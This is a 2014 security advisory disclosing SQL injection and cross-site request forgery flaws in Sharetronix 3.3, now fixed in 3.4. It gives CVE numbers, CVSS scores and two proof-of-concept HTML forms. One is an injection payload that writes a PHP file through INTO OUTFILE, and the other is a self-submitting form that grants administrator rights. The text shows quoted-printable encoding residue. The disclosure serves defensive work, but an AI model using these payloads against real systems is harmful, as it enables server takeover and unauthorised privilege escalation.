Advisory ID: HTB23214 Product: Sharetronix Vendor: Blogtronix, LLC Vulnerable Version(s): 3.3 and probably prior Tested Version: 3.3 Advisory Publication: May 7, 2014 [without technical details] Vendor Notification: May 7, 2014=20 Vendor Patch: May 27, 2014=20 Public Disclosure: May 28, 2014=20 Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE= -352] CVE References: CVE-2014-3414, CVE-2014-3415 Risk Level: High=20 CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C= :P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities = in Sharetronix, which can be exploited to perform SQL injection and =D0=A1r= oss-Site Request Forgery (CSRF) attacks against vulnerable application. A r= emote hacker can gain full control over the application.=20 1) SQL Injection in Sharetronix: CVE-2014-3415 Input passed via the "invite_users[]" HTTP POST parameter to "/[group_name]= /invite" URI is not properly sanitised before being used in SQL query. A re= mote attacker can send a specially crafted HTTP POST request and execute ar= bitrary SQL commands in application's database. The following exploit code below creates a file "file.php" within the home = directory of MySQL server with output of the "phpinfo()" PHP function in: <form action=3D"http://[host]/[group_name]/invite" method=3D"post" name=3D"= main"> <input type=3D"hidden" name=3D"invite_users[]" value=3D'0" UNION SELECT "<?= phpinfo(); ?>",2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 INTO OU= TFILE "file.php" -- '> <input type=3D"submit" id=3D"btn"> </form> The attacker must be registered and logged-in (the registration is open by = default). The attacker also must initially create a group (action allowed b= y default), in our example the group name is "group_name". 2) =D0=A1ross-Site Request Forgery (CSRF) in Sharetronix: CVE-2014-3414 The vulnerability exists due to insufficient validation of HTTP request ori= gin. A remote attacker can trick a logged-in administrator to open a web pa= ge with CSRF exploit and grant administrative privileges to arbitrary exist= ing user of the vulnerable application. The registration is open by default= =2E=20 The following CSRF exploit below grants administrative privileges to the us= er "username": <form action=3D"http://[host]/admin/administrators" method=3D"post" name=3D= "main"> <input type=3D"hidden" name=3D"admin" value=3D"username"> <input type=3D"submit" id=3D"btn"> </form> <script> document.main.submit(); </script> ---------------------------------------------------------------------------= -------------------- Solution: Update to Sharetronix 3.4 More Information: http://developer.sharetronix.com/download ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23214 - https://www.htbridge.com/advisory/= HTB23214 - Multiple vulnerabilities in Sharetronix. [2] Sharetronix - http://sharetronix.com/ - Sharetronix is a Secure Social = Network for Your Company. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types. [5] ImmuniWeb=C2=AE SaaS - https://www.htbridge.com/immuniweb/ - hybrid of = manual web application penetration test and cutting-edge vulnerability scan= ner available online via a Software-as-a-Service (SaaS) model. ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.